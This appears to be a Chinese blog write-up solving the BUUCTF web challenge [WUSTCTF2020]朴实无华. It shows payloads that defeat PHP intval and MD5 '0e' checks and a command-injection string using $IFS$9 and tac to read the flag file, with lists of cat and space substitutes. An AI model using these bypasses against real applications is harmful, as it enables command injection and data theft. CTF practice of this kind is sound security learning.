首页 > 其他分享 >buuctf-[WUSTCTF2020]朴实无华

buuctf-[WUSTCTF2020]朴实无华

时间:2023-07-26 13:57:47浏览次数:62  
标签:buuctf 解析 WUSTCTF2020 IFS num 朴实无华 php payload md5

打开靶机显示

 

 啥都没有,先去查看robots.txt  发现

 

 之后再fake里面请求头中发现fl4g.php  

最后绕过三层php限制

 

 第一关 intvar  可以解析科学计数法  所以传入  1e4

第一个截断解析为1   第二个加一解析为10001  payload:num=1e4

第二关 只要是0e开头md5 或者用数组绕过       payload: md5=0e215962017

第三关 过滤  空格  和 cat   

代替cat: more、less、head、tail、sort、ca\t
代替空格:$IFS、${IFS}、$IFS$1、$IFS$9

最后 payload: /fl4g.php?num=1e10&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

 

 

标签:buuctf,解析,WUSTCTF2020,IFS,num,朴实无华,php,payload,md5
From: https://www.cnblogs.com/aacjlokl/p/16557461.html

相关文章

  • pwn | buuctf刷题记录(二)
    babyheap_0ctf_2017堆溢出,extendoverlap,unsortedbinleak,fastbinattackedit选项可以随意溢出堆块,通过扩展堆块造成重叠,把后面一个bins的fd给打出来,从而泄露libc,通过fastbinattack将malloc_hook改为one_gadgetextendoverlap1.首先申请四个堆块,note0用于溢出修改note1的si......
  • buuctf-[WesternCTF2018]shrine
    最近学习了一下SSTI,用这个题目来试试手SSTI原理:WEB应用中模板的引用存在可变变量由于有一个渲染函数flask.render_template_string()所以可以判断这是一个SSTI的考点然后观察代码,这个代码需传入一个shrine的值,然后这个对传入的值进行了“()”的过滤,并且可以知道flag储存与当前......
  • pwn | buuctf刷题(一)
    test_your_ncnc连上去就是一个shellpwn1gets栈溢出,ret2text打远程的时候遇到如下报错,原因可能有两个timeout:themonitoredcommanddumpedcore一是get_flag后未正常退出,需要给get_flag的返回地址写个exit二是栈未对齐,导致程序异常退出,如下所示,ret时rsp为...968成功进......
  • buuctf写题
    php反序列化字符逃逸easy_serialize_php拿到源码:<?php$function=@$_GET['f'];functionfilter($img){$filter_arr=array('php','flag','php5','php4','fl1g');$filter='/'.implode(�......
  • re | buuctf逆向刷题之crackMe
    写在前头本题来自安洵杯2019crackMe,涉及到的知识点较多,Mark一下分析从main开始反编译main函数,9行这里触发了一个内存写异常,有点奇怪哈发现SEH查看汇编,哦这里注册了一个SEH函数,sub4100F跟进去看一下,很简单的算法,input划分为4个4字节的值,赋给v5,v5数组按照往后递推的方式,由......
  • buuctf刷题笔记
    换表的base64解密importbase64importstringstr1="x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q"string1="ZYXABCDEFGHIJKLMNOPQRSTUVWzyxabcdefghijklmnopqrstuvw0123456789+/"string2="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl......
  • BUUCTF:[安洵杯 2019]easy_web
    https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_webTXpVek5UTTFNbVUzTURabE5qYz0经过base64decode->base64decode->hexdecode得到555.png解码编码脚本或者自己利用在线工具编码也行frombinasciiimport*frombase64import*defdecode(param):r......
  • BUUCTF:[BJDCTF2020]EasySearch
    index.php.swp发现源码<?php ob_start(); functionget_hash(){ $chars='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random=$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_ran......
  • BUUCTF:[CISCN2019 华东南赛区]Web11
    注意到了banner中信息说是smarty,并且将XFF输出到页面直接尝试Smarty模板注入{$smarty.version}Smarty3官方手册:https://www.smarty.net/docs/zh_CN/language.function.if.tpl{ifsystem('ls-lha/')}{/if}{ifsystem('cat/flag')}{/if}......
  • BUUCTF:[WesternCTF2018]shrine
    https://buuoj.cn/challenges#[WesternCTF2018]shrineimportflaskimportosapp=flask.Flask(__name__)app.config['FLAG']=os.environ.pop('FLAG')@app.route('/')defindex(): returnopen(__file__).read() @app.route(&......